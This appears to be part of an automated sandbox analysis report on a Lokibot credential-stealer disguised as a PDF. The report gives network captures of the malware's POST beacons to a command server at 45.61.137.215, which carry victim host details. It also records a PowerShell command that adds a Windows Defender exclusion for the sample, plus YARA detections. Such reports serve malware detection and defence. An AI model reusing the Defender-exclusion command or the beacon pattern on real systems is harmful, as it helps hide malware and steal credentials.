May 29, 2024 15:46:07.301475048 CEST	672	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:46:07.301511049 CEST	1236	IN	Data Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
May 29, 2024 15:46:07.301541090 CEST	224	IN	Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
May 29, 2024 15:46:07.301575899 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:46:07.301609993 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:46:07.301645041 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:46:07.301678896 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.9	49807	45.61.137.215	80

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:46:07.455147982 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:46:07.460093975 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:46:09.901803017 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:46:07 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:46:09.901832104 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:46:09.901854992 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:46:09.901868105 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:46:09.901983023 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:46:09.902167082 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:46:09.902239084 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:46:09.902251959 CEST	1236	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:46:09.902282953 CEST	1236	IN	Data Raw: 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b Data Ascii: ar(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important
May 29, 2024 15:46:09.902307987 CEST	896	IN	Data Raw: 61 63 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 Data Ascii: ack-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--w

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.9	49808	45.61.137.215	80

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:46:10.058300018 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:46:10.063270092 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:46:12.658502102 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:46:10 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:46:12.658530951 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:46:12.658566952 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:46:12.658577919 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:46:12.658587933 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:46:12.658607006 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:46:12.658620119 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:46:12.658632994 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:46:12.658720016 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:46:12.658740997 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Target ID:	6
Start time:	09:42:03
Start date:	29/05/2024
Path:	C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe"
Imagebase:	0xa50000
File size:	524'288 bytes
MD5 hash:	CFF39149D540E851536383F64D5F5568
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Target ID:	11
Start time:	09:42:05
Start date:	29/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe"
Imagebase:	0x8b0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	12
Start time:	09:42:05
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	14
Start time:	09:42:07
Start date:	29/05/2024
Path:	C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe
Wow64 process (32bit):	true
